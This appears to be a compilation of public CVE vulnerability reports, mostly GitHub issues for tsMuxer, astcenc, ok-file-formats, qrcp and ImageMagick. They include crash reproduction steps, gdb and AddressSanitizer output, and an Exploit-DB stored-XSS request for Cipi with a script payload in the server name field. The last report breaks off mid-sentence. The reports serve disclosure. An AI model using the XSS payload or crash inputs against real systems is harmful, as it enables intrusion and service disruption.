There is an Assertion `num <= INT_BIT' failed at BitStreamReader::skipBits in /bitStream.h:132 of tsMuxer git-c6a0277.

Hi, I Found an Assertion Failed error.

**Some info:**

    Ubuntu 20.04.3 LTS
    tsMuxeR version git-c6a0277
    

**To reproduce**

1.  Compile tsMuxer
2.  Run tsmuxer

    tsmuxer ./poc
    tsMuxeR version git-c6a0277. github.com/justdan96/tsMuxer
    tsmuxer: tsMuxer/tsMuxer/bitStream.h:132: void BitStreamReader::skipBits(unsigned int): Assertion `num <= INT_BIT' failed.
    [1]    883819 abort (core dumped)  tsmuxer ./poc
    

**POC**  
poc.zip

**gdb output**

    gdb-peda$ r ./poc
    Starting program: tsMuxer/build/tsMuxer/tsmuxer ./poc
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    tsMuxeR version git-c6a0277. github.com/justdan96/tsMuxer
    tsmuxer: tsMuxer/tsMuxer/bitStream.h:132: void BitStreamReader::skipBits(unsigned int): Assertion `num <= INT_BIT' failed.
    
    Program received signal SIGABRT, Aborted.
    [----------------------------------registers-----------------------------------]
    RAX: 0x0
    RBX: 0x7ffff793f080 (0x00007ffff793f080)
    RCX: 0x7ffff79be18b (<__GI_raise+203>:	mov    rax,QWORD PTR [rsp+0x108])
    RDX: 0x0
    RSI: 0x7fffffff6ba0 --> 0x0
    RDI: 0x2
    RBP: 0x7ffff7b33588 ("%s%s%s:%u: %s%sAssertion `%s' failed.\n%n")
    RSP: 0x7fffffff6ba0 --> 0x0
    RIP: 0x7ffff79be18b (<__GI_raise+203>:	mov    rax,QWORD PTR [rsp+0x108])
    R8 : 0x0
    R9 : 0x7fffffff6ba0 --> 0x0
    R10: 0x8
    R11: 0x246
    R12: 0x555555832c90 ("tsMuxer/tsMuxer/bitStream.h")
    R13: 0x84
    R14: 0x555555832cc6 ("num <= INT_BIT")
    R15: 0x0
    EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
       0x7ffff79be17f <__GI_raise+191>:	mov    edi,0x2
       0x7ffff79be184 <__GI_raise+196>:	mov    eax,0xe
       0x7ffff79be189 <__GI_raise+201>:	syscall
    => 0x7ffff79be18b <__GI_raise+203>:	mov    rax,QWORD PTR [rsp+0x108]
       0x7ffff79be193 <__GI_raise+211>:	xor    rax,QWORD PTR fs:0x28
       0x7ffff79be19c <__GI_raise+220>:	jne    0x7ffff79be1c4 <__GI_raise+260>
       0x7ffff79be19e <__GI_raise+222>:	mov    eax,r8d
       0x7ffff79be1a1 <__GI_raise+225>:	add    rsp,0x118
    [------------------------------------stack-------------------------------------]
    0000| 0x7fffffff6ba0 --> 0x0
    0008| 0x7fffffff6ba8 --> 0x7ffff7a15850 (<__GI___libc_free>:	endbr64)
    0016| 0x7fffffff6bb0 --> 0x7ffffbad8000
    0024| 0x7fffffff6bb8 --> 0x5555558ffcf0 --> 0x5555558ffd90 --> 0x0
    0032| 0x7fffffff6bc0 --> 0x5555558ffd55 ("signed int): Assertion `num <= INT_BIT' failed.\n")
    0040| 0x7fffffff6bc8 --> 0x5555558ffcf0 --> 0x5555558ffd90 --> 0x0
    0048| 0x7fffffff6bd0 --> 0x5555558ffcf0 --> 0x5555558ffd90 --> 0x0
    0056| 0x7fffffff6bd8 --> 0x5555558ffd85 --> 0xa1000000
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    Stopped reason: SIGABRT
    __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50
    50	../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    gdb-peda$ bt
    #0  __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:50
    #1  0x00007ffff799d859 in __GI_abort () at abort.c:79
    #2  0x00007ffff799d729 in __assert_fail_base (
        fmt=0x7ffff7b33588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n",
        assertion=0x555555832cc6 "num <= INT_BIT",
        file=0x555555832c90 "tsMuxer/tsMuxer/bitStream.h", line=0x84,
        function=<optimized out>) at assert.c:92
    #3  0x00007ffff79aef36 in __GI___assert_fail (assertion=0x555555832cc6 "num <= INT_BIT",
        file=0x555555832c90 "tsMuxer/tsMuxer/bitStream.h", line=0x84,
        function=0x555555832cd8 "void BitStreamReader::skipBits(unsigned int)") at assert.c:101
    #4  0x00005555556c3395 in BitStreamReader::skipBits(unsigned int) ()
    #5  0x00005555557f233c in VvcUnitWithProfile::profile_tier_level(bool, int) ()
    #6  0x00005555557f3c36 in VvcSpsUnit::deserialize() ()
    #7  0x00005555557fa234 in VVCStreamReader::checkStream(unsigned char*, int) ()
    #8  0x0000555555742753 in METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) ()
    #9  0x0000555555741afb in METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) ()
    #10 0x000055555571ca8a in detectStreamReader(char const*, MPLSParser*, bool) ()
    #11 0x000055555571fafc in main ()
    #12 0x00007ffff799f0b3 in __libc_start_main (main=0x55555571ed30 <main>, argc=0x2,
        argv=0x7fffffffe318, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>,
        stack_end=0x7fffffffe308) at ../csu/libc-start.c:308
    #13 0x00005555556bac2e in _start ()
    gdb-peda$

CVE-2021-45861: Assertion Failed in bitStream.h:132 BitStreamReader::skipBits · Issue #478 · justdan96/tsMuxer

Cipi 3.1.15 allows Add Server stored XSS via the /api/servers name field.

    # Exploit Title: Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)
    # Date: 24.02.2022
    # Exploit Author: Fikrat Ghuliev (Ghuliev)
    # Vendor Homepage: https://cipi.sh/ <https://www.aapanel.com/>
    # Software Link: https://cipi.sh/ <https://www.aapanel.com/>
    # Version: 3.1.15
    # Tested on: Ubuntu
    
    When the user wants to add a new server on the "Server" panel, in "name"
    parameter has not had any filtration.
    
    POST /api/servers HTTP/1.1
    Host: IP
    Content-Length: 102
    Accept: application/json
    X-Requested-With: XMLHttpRequest
    Authorization: Bearer
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
    (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
    Content-Type: application/json
    Origin: http://IP
    Referer: http://IP/servers
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {
    "name":"\"><script>alert(1337)</script>",
    "ip":"10.10.10.10",
    "provider":"local",
    "location":"xss test"
    }

CVE-2022-26332: Offensive Security’s Exploit Database Archive

qrcp through 0.8.4, in receive mode, allows ../ Directory Traversal via the file name specified by the uploader.

While qrcp works on receive mode, uploader can edit the file name in HTTP request and add "../". Meanwhile, qrcp doesn't check legality of file name which lead to directory traversal.  
Env: qrcp-0.8.4, Windows 10 x86\_64, Ubuntu 20.04 x86\_64  
Poc:  
![image](https://user-images.githubusercontent.com/69268043/156000336-2b3019b6-4cdb-40ed-a305-4e48bf3628e9.png)  
![image](https://user-images.githubusercontent.com/69268043/156000944-8e1ab6e9-cbdd-42b2-8af2-839a5aff3036.png)  
![image](https://user-images.githubusercontent.com/69268043/156001182-98f2a234-a91e-4e34-b8aa-57d9082051c2.png)

credit: starryloki,lu0sf

CVE-2022-26315: Directory Traversal Vulnerability · Issue #223 · claudiodangelis/qrcp

ARM astcenc 3.2.0 is vulnerable to Buffer Overflow in function encode_ise().

**Version**

    astcenc v3.2.0, 64-bit sse2
    

**Environment**

Ubuntu 18.04，64 bit

**Command**

**Compile test program:**

$ mkdir build
$ cd build
$ cmake -G "Unix Makefiles" -DCMAKE\_BUILD\_TYPE=Release ..
$ make -j8

**Compile test program with address sanitizer:**

*   Update Makefile:

    $ set(CMAKE_C_COMPILER "/usr/bin/gcc")
    $ set(CMAKE_CXX_COMPILER "/usr/bin/g++")
    $ set(CMAKE_C_FLAGS "-fsanitize=address")
    $ set(CMAKE_CXX_FLAGS "-fsanitize=address")
    

*   Compile program:

    $ mkdir -p asan_build
    $ cd asan_build
    $ cmake -G "Unix Makefiles" -DCMAKE_BUILD_TYPE=Release ..
    $ make -j8
    

**Result**

The result of running without ASAN:

    $ ./astcenc-native -cl crash01 out1.astc 6x6 -medium
    
    Segmentation fault (core dumped)
    

Information obtained by using ASAN:

    $ ./astcenc-native_asan -cl crash01 out1.astc 6x6 -medium
    
    ==10804==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f5352492320 at pc 0x5602c3a3f015 bp 0x7f53524921e0 sp 0x7f53524921d0
    READ of size 1 at 0x7f5352492320 thread T1
        #0 0x5602c3a3f014 in encode_ise(quant_method, unsigned int, unsigned char const*, unsigned char*, unsigned int) (/docker/astc_test/te/Source/astcenc-native+0xee014)
        #1 0x5602c39eb36c in symbolic_to_physical(block_size_descriptor const&, symbolic_compressed_block const&, physical_compressed_block&) (/docker/astc_test/te/Source/astcenc-native+0x9a36c)
        #2 0x5602c3a19b07 in compress_image(astcenc_context&, unsigned int, astcenc_image const&, astcenc_swizzle const&, unsigned char*) (/docker/astc_test/te/Source/astcenc-native+0xc8b07)
        #3 0x5602c3a1e382 in astcenc_compress_image(astcenc_context*, astcenc_image*, astcenc_swizzle const*, unsigned char*, unsigned long, unsigned int) (/docker/astc_test/te/Source/astcenc-native+0xcd382)
        #4 0x5602c39cdc33 in compression_workload_runner(int, int, void*) (/docker/astc_test/te/Source/astcenc-native+0x7cc33)
        #5 0x5602c39cac53 in launch_threads_helper(void*) [clone .lto_priv.0] (/docker/astc_test/te/Source/astcenc-native+0x79c53)
        #6 0x7f5357c45608 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x9608)
        #7 0x7f53580d4292 in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x122292)
    
    Address 0x7f5352492320 is located in stack of thread T1 at offset 96 in frame
        #0 0x5602c39ea13f in symbolic_to_physical(block_size_descriptor const&, symbolic_compressed_block const&, physical_compressed_block&) (/docker/astc_test/te/Source/astcenc-native+0x9913f)
    
      This frame has 3 object(s):
        [32, 48) 'weightbuf' (line 146)
        [64, 96) 'values_to_encode' (line 247) <== Memory access at offset 96 overflows this variable
        [128, 192) 'weights' (line 160)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    Thread T1 created by T0 here:
        #0 0x7f53581fba95 in __interceptor_pthread_create (/lib/x86_64-linux-gnu/libasan.so.6+0x57a95)
        #1 0x5602c3a780b0 in launch_threads(int, void (*)(int, int, void*), void*) [clone .constprop.0] (/docker/astc_test/te/Source/astcenc-native+0x1270b0)
    
    SUMMARY: AddressSanitizer: stack-buffer-overflow (/docker/astc_test/te/Source/astcenc-native+0xee014) in encode_ise(quant_method, unsigned int, unsigned char const*, unsigned char*, unsigned int)
    Shadow bytes around the buggy address:
      0x0feaea48a410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0feaea48a420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0feaea48a430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0feaea48a440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0feaea48a450: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 f2 f2
    =>0x0feaea48a460: 00 00 00 00[f2]f2 f2 f2 00 00 00 00 00 00 00 00
      0x0feaea48a470: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
      0x0feaea48a480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0feaea48a490: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0feaea48a4a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0feaea48a4b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==10804==ABORTING
    

**Description**

    A stack-buffer-overflow was discovered in astcenc.The issue is being triggered in function encode_ise().
    

**Poc**

Poc file is this.

CVE-2021-44331: stack-buffer-overflow in function encode_ise() · Issue #294 · ARM-software/astc-encoder

David Brackeen ok-file-formats 203defd is vulnerable to Buffer Overflow via function ok_png_transform_scanline() in "/ok_png.c:494".

**Version**

203defd

**Environment**

Ubuntu 18.04，64 bit

**Testcase**

#include <stdio.h\>
#include <stdlib.h\>
#include "ok\_png.c" 
#include "ok\_png.h"

int main(int \_argc, char \*\*\_argv) {
    FILE \*file = fopen(\_argv\[1\], "rb");
    ok\_png image = ok\_png\_read(file, OK\_PNG\_COLOR\_FORMAT\_RGBA );
    fclose(file);
    if (image.data) {
        printf("Got image! Size: %li x %li\\n", (long)image.width, (long)image.height);
        free(image.data);
    }
    return 0;
}

**Command**

Compile test program:

    $ gcc -g -o main main.c ok_png.h
    

Compile test program with address sanitizer with this command:

    $ gcc -g -fsanitize=address -o asanpng main.c ok_png.h
    

**Result**

The result of running without ASAN:

    $ ./asanpng heap-buffer-overflow-7.png
    Segmentation fault (core dumped)
    

Information obtained by using ASAN:

    $ ./asanpng heap-buffer-overflow-7.png
    =================================================================
    ==1998==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000002500 at pc 0x0000004e3d62 bp 0x7ffe6e5d0b90 sp 0x7ffe6e5d0b88
    WRITE of size 1 at 0x621000002500 thread T0
        #0 0x4e3d61 in ok_png_transform_scanline /docker/ok-file-formats-png/ok_png.c:494:20
        #1 0x4e3d61 in ok_png_read_data /docker/ok-file-formats-png/ok_png.c:895:13
        #2 0x4e3d61 in ok_png_decode2 /docker/ok-file-formats-png/ok_png.c:971:23
        #3 0x4e3d61 in ok_png_decode /docker/ok-file-formats-png/ok_png.c:1025:5
        #4 0x4e81d5 in ok_png_read_with_allocator /docker/ok-file-formats-png/ok_png.c:188:9
        #5 0x4e81d5 in ok_png_read /docker/ok-file-formats-png/ok_png.c:177:12
        #6 0x4e81d5 in main /docker/ok-file-formats-png/main.c:8:20
        #7 0x7f5e82a180b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #8 0x41c38d in _start (/docker/ok-file-formats-png/afl_asan+0x41c38d)
    
    0x621000002500 is located 0 bytes to the right of 4096-byte region [0x621000001500,0x621000002500)
    allocated by thread T0 here:
        #0 0x4975ed in malloc (/docker/ok-file-formats-png/afl_asan+0x4975ed)
        #1 0x4cd004 in ok_png_read_data /docker/ok-file-formats-png/ok_png.c:774:29
        #2 0x4cd004 in ok_png_decode2 /docker/ok-file-formats-png/ok_png.c:971:23
        #3 0x4cd004 in ok_png_decode /docker/ok-file-formats-png/ok_png.c:1025:5
        #4 0x4e81d5 in ok_png_read_with_allocator /docker/ok-file-formats-png/ok_png.c:188:9
        #5 0x4e81d5 in ok_png_read /docker/ok-file-formats-png/ok_png.c:177:12
        #6 0x4e81d5 in main /docker/ok-file-formats-png/main.c:8:20
        #7 0x7f5e82a180b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /docker/ok-file-formats-png/ok_png.c:494:20 in ok_png_transform_scanline
    Shadow bytes around the buggy address:
      0x0c427fff8450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff8460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff8470: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff8480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff8490: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c427fff84a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff84b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff84d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff84e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff84f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1998==ABORTING
    

**Description**

A heap-buffer-overflow was discovered in ok\_file\_formats. The issue is being triggered in function ok\_png\_transform\_scanline() at ok\_png.c:494:20

**Poc**

Poc file is this.

CVE-2021-44342: heap-buffer-overflow in function ok_png_transform_scanline() at  ok_png.c:494:20 · Issue #19 · brackeen/ok-file-formats

David Brackeen ok-file-formats 203defd is vulnerable to Buffer Overflow. When the function of the ok-file-formats project is used, a heap-buffer-overflow occurred in function ok_png_transform_scanline() in "/ok_png.c:712".

**Version**

203defd

**Environment**

Ubuntu 18.04，64 bit

**Testcase**

#include <stdio.h\>
#include <stdlib.h\>
#include "ok\_png.c" 
#include "ok\_png.h"

int main(int \_argc, char \*\*\_argv) {
    FILE \*file = fopen(\_argv\[1\], "rb");
    ok\_png image = ok\_png\_read(file, OK\_PNG\_COLOR\_FORMAT\_RGBA );
    fclose(file);
    if (image.data) {
        printf("Got image! Size: %li x %li\\n", (long)image.width, (long)image.height);
        free(image.data);
    }
    return 0;
}

**Command**

Compile test program:

    $ gcc -g -o main main.c ok_png.h
    

Compile test program with address sanitizer with this command:

    $ gcc -g -fsanitize=address -o asanpng main.c ok_png.h
    

**Result**

The result of running without ASAN:

    $ ./main heap-buffer-overflow-3.png
    free(): invalid pointer
    Aborted (core dumped)
    

Information obtained by using ASAN:

    $ ./asanpng heap-buffer-overflow-3.png
    ==8813==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000002680 at pc 0x0000004e48dc bp 0x7ffe51b2f890 sp 0x7ffe51b2f888
    WRITE of size 4 at 0x621000002680 thread T0
        #0 0x4e48db in ok_png_transform_scanline /docker/ok-file-formats-png/ok_png.c:712:13
        #1 0x4e48db in ok_png_read_data /docker/ok-file-formats-png/ok_png.c:895:13
        #2 0x4e48db in ok_png_decode2 /docker/ok-file-formats-png/ok_png.c:971:23
        #3 0x4e48db in ok_png_decode /docker/ok-file-formats-png/ok_png.c:1025:5
        #4 0x4e81d5 in ok_png_read_with_allocator /docker/ok-file-formats-png/ok_png.c:188:9
        #5 0x4e81d5 in ok_png_read /docker/ok-file-formats-png/ok_png.c:177:12
        #6 0x4e81d5 in main /docker/ok-file-formats-png/main.c:8:20
        #7 0x7fe87e6f50b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #8 0x41c38d in _start (/docker/ok-file-formats-png/afl_asan+0x41c38d)
    
    0x621000002680 is located 384 bytes to the right of 4096-byte region [0x621000001500,0x621000002500)
    allocated by thread T0 here:
        #0 0x4975ed in malloc (/docker/ok-file-formats-png/afl_asan+0x4975ed)
        #1 0x4cd004 in ok_png_read_data /docker/ok-file-formats-png/ok_png.c:774:29
        #2 0x4cd004 in ok_png_decode2 /docker/ok-file-formats-png/ok_png.c:971:23
        #3 0x4cd004 in ok_png_decode /docker/ok-file-formats-png/ok_png.c:1025:5
        #4 0x4e81d5 in ok_png_read_with_allocator /docker/ok-file-formats-png/ok_png.c:188:9
        #5 0x4e81d5 in ok_png_read /docker/ok-file-formats-png/ok_png.c:177:12
        #6 0x4e81d5 in main /docker/ok-file-formats-png/main.c:8:20
        #7 0x7fe87e6f50b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /docker/ok-file-formats-png/ok_png.c:712:13 in ok_png_transform_scanline
    Shadow bytes around the buggy address:
      0x0c427fff8480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff8490: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c427fff84a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff84b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c427fff84d0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff84e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff84f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff8500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff8510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c427fff8520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==8813==ABORTING
    

**Description**

A heap-buffer-overflow was discovered in ok\_file\_formats. The issue is being triggered in function ok\_png\_transform\_scanline() at ok\_png.c:712:13.

**Poc**

Poc file is this.

CVE-2021-44339: heap-buffer-overflow in function ok_png_transform_scanline() at  ok_png.c:712:13  · Issue #15 · brackeen/ok-file-formats

David Brackeen ok-file-formats 97f78ca is vulnerable to Buffer Overflow. When the function of the ok-file-formats project is used, a heap-buffer-overflow occurs in function ok_jpg_convert_YCbCr_to_RGB() in "/ok_jpg.c:513" .

**Version**

dev version, git clone https://github.com/brackeen/ok-file-formats.git

**Environment**

Ubuntu 18.04, 64bit

**Testcase**

#include <stdio.h\>
#include <stdlib.h\>
#include "ok\_jpg.h"
#include "ok\_jpg.c"
 
int main(int \_argc, char \*\*\_argv) {
    FILE \*file = fopen("\_argv\[1\]", "rb");
    ok\_jpg image = ok\_jpg\_read(file, OK\_JPG\_COLOR\_FORMAT\_RGBA);
    fclose(file);
    if (image.data) {
        printf("Got image! Size: %li x %li\\n", (long)image.width, (long)image.height);
        free(image.data);
    }
    return 0;
}

**Command**

Compile test program:

$ gcc -g -o main main.c ok\_jpg.h

Compile test program with address sanitizer with this command:

$ gcc -g -fsanitize=address -fno-omit-frame-pointer -O1 -o Asanjpg main.c ok\_jpg.h

**Result**

The result of running without ASAN:

$ ./main heap-buffer-overflow-2.jpg
double free or corruption (!prev)
Aborted

Information obtained by using ASAN:

$ ./Asanjpg heap-buffer-overflow-2.jpg
=================================================================
==3402==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x63000000024c at pc 0x5632c5205ffb bp 0x7ffc939581c0 sp 0x7ffc939581b0
WRITE of size 1 at 0x63000000024c thread T0
    #0 0x5632c5205ffa in ok\_jpg\_convert\_YCbCr\_to\_RGB /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:513
    #1 0x5632c5205ffa in ok\_jpg\_convert\_data\_unit\_color /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:545
    #2 0x5632c5205ffa in ok\_jpg\_convert\_data\_unit /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:607
    #3 0x5632c5212c3d in ok\_jpg\_decode\_scan /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:1276
    #4 0x5632c5212c3d in ok\_jpg\_read\_sos /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:1742
    #5 0x5632c5212c3d in ok\_jpg\_decode2 /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:1930
    #6 0x5632c5212c3d in ok\_jpg\_decode /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:2004
    #7 0x5632c52142dc in ok\_jpg\_read\_with\_allocator /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:268
    #8 0x5632c5214412 in ok\_jpg\_read /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:257
    #9 0x5632c52146b1 in main /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/main.c:10
    #10 0x7f0ab88adbf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #11 0x5632c5203499 in \_start (/home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/Asanjpg+0x1499)

0x63000000024c is located 436 bytes to the left of 60000-byte region \[0x630000000400,0x63000000ee60)
allocated by thread T0 here:
    #0 0x7f0ab8d5bb40 in \_\_interceptor\_malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xdeb40)
    #1 0x5632c52037e1 in ok\_stdlib\_alloc /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:55
    #2 0x5632c520ed69 in ok\_jpg\_read\_sof /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:1613
    #3 0x5632c520ed69 in ok\_jpg\_decode2 /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:1910
    #4 0x5632c520ed69 in ok\_jpg\_decode /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:2004
    #5 0x5632c52142dc in ok\_jpg\_read\_with\_allocator /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:268
    #6 0x5632c5214412 in ok\_jpg\_read /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:257
    #7 0x5632c52146b1 in main /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/main.c:10
    #8 0x7f0ab88adbf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok\_jpg.c:513 in ok\_jpg\_convert\_YCbCr\_to\_RGB
Shadow bytes around the buggy address:
  0x0c607fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c607fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c607fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c607fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c607fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
\=>0x0c607fff8040: fa fa fa fa fa fa fa fa fa\[fa\]fa fa fa fa fa fa
  0x0c607fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c607fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c607fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c607fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c607fff8090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\==3402\==ABORTING

**Description**

A heap-buffer-overflow was discovered in ok\_file\_formats. The issue is being triggered in function ok\_jpg\_convert\_YCbCr\_to\_RGB() at ok\_jpg.c:513

**Poc**

Poc file is this.

CVE-2021-44334: heap-buffer-overflow in functionok_jpg_convert_YCbCr_to_RGB() at  ok_jpg.c:513 · Issue #12 · brackeen/ok-file-formats

A NULL pointer dereference flaw was found in ImageMagick in versions prior to 7.0.10-31 in ReadSVGImage() in coders/svg.c. This issue is due to not checking the return value from libxml2's xmlCreatePushParserCtxt() and uses the value directly, which leads to a crash and segmentation fault.

**Prerequisites**

*   \[Y \] I have written a descriptive issue title
*   \[Y\] I have verified that I am using the latest version of ImageMagick
*   \[Y\] I have searched open and closed issues to ensure it has not already been reported.

**Description**

There is a segmentation fault caused by the NPD in function ReadSVGImage, svg.c:3621 in ImageMagick 7.0.10.  
ImageMagick does not check the nullity of the pointer returned from libxml2 and dereference it directly.  
This directly leads to program crashes and segmentation fault.

**Steps to Reproduce**

1, To ensure reproduce, I use up space in the /tmp folder as a low-level privilege user.  
